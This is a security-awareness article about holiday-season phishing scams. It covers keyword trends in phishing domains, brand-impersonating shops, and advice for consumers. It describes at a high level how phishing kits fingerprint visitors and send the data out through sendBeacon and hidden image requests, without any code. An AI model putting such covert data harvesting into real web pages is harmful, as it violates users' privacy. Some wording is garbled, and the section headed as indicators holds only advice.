The onset of Cyber Monday and Black Friday deals is something we all stay up for. Whether it’s discounted vacation travel packages, instructional offers to polish up competencies, or securing buying offers, those incomes are an opportunity to capture what you’ve been eyeing all year long. However, the rush to secure these deals before they sell out is an increasing risk for the buyers.
Cybercriminals are taking advantage of the holiday shopping craze, creating fake offers, running fake campaigns targeting popular brands, and tricking people into giving up their financial and personal information, which leads to identity theft and significant monetary loss.
To help illuminate this issue, researchers at Bolster have been examining the modern trends and scams targeted at buyers this season. The findings provide detailed perceptions of how these scams work and, extra importantly, how you can defend yourself from falling prey to them.
Trend Analysis
During the much-anticipated Black Friday and Cyber Monday deals, cybercriminals increasingly use popular holiday-themed phrases in domain names and website content to target unwary consumers. By examining trending phrases for October and November, bolster researchers predicted notable increases in phishing activity as the month went on.
Phishing websites with terms like “black,” “Friday,” or both are predicted to increase by a startling 177% between October and the end of November, according to rendered text data. On the other hand, domain data for the same terms indicates a 77% anticipated increase. More alarmingly, it is predicted that phishing efforts utilizing phrases such as “black,” “Friday,” “deals,” or a combination of these will rise sharply—by 344% in displayed text and an astounding 552% in domains.
These figures highlight how urgent it is to raise awareness over the upcoming holiday sale season. Customers need to be on guard since phrases like “Black Friday deal,” “claim gift,” and “free gift card” are becoming popular targets for phishing attempts. The dramatic increase in phishing keywords is indicative of how hackers take advantage of holiday shopping patterns to trick consumers, leading to PII [Personally Identifiable Information] at risk.
Anatomy of the Operations
Bolster’s researchers were able to hunt down multiple scam websites where legitimate brands were mimicked, some of which are mentioned in IOC’s table. Cybercriminals frequently register domain names that closely resemble those of well-known brands to deceive users.
Analysis of website/phishing
Poor grammar and spelling: Many Phishing websites display incorrect or awkward grammar, which is a common indicator of fraud. One such indicator can be seen in the image below, “We Free Shipping Worldwide.”
Geolocation Clues: Clear symptoms, along with Chinese textual content and encrypted Unicode characters, indicate a possible connection to China or Mandarin-talking areas.
CDN: External resources, such as “https://cdn.staticsee.com“, found in the investigation indicate the use of virtual infrastructure, which may have been shared across multiple phishing campaigns. A Content Delivery Network (CDN) is a server-based system geographically distributed and designed to optimize the delivery of Web content. The CDN in the phishing industry highlights the elaborate techniques used to mask malicious activity and makes the attack pattern more flexible and difficult to detect.
External URLs: References to external URLs for tracking the product, possibly using fake tracking company links or order IDs.
Fraudulent platforms: Another red flag is the use of platforms like Oemsaas and Oemapps linked to fraudulent activities. These platforms lure victims with deceptive promotions and charge money but fail to deliver the promised product.
Data Harvesting: The JavaScript code collects various client-side data, such as user browser information, screen resolution, time zone, language, previous URL, etc. This data is stored in cookies to fingerprint the victim in the user’s context (e.g., language or screen size). It helps phishing kits tailor the attack by customizing it on a page-by-page basis and tracking user activity for future visits.
Data Exfiltration: Collected data is sent to the remote server using methods such as navigator.sendBeacon or fallback methods (such as self.fireBeaconImg). sendBeacon is commonly used because it can send data asynchronously without interrupting the page unloading process, making it harder for the user to see what data is being sent. In case the main method fails, a fallback ensures that data is still transmitted, usually through a hidden image request or similar mechanism.
Beacon Data exfiltration
IOC’s
- Beware of unsolicited emails and websites offering “too-good-to-be-true” deals.
- Verify that websites are legitimate by monitoring secure connections (HTTPS) and looking for signs of authenticity.
- Do not click on suspicious links or provide personal information unless you are absolutely sure that the website is legitimate.
- Use URL scanning tools like CheckPhish to verify the legitimacy of the websites/domains before opening the webpage.
- Organizations should also invest in advanced security measures, such as multifactor authentication (MFA) and phishing detection software, to prevent users from falling prey to these scams.
- Awareness mail or messages should be sent to customers from time to time to inform them about legitimate websites, email addresses, and SMS numbers.
Conclusion
As the holiday shopping season approaches, cybercriminals increasingly use exploits to satisfy consumers’ appetite for deals. By understanding the trends, anatomy, and mechanisms of these frauds, consumers can better protect themselves and avoid becoming victims of identity theft and fraud. The key to the risks of the decline in online shopping during the holiday season is to increase awareness and vigilance.
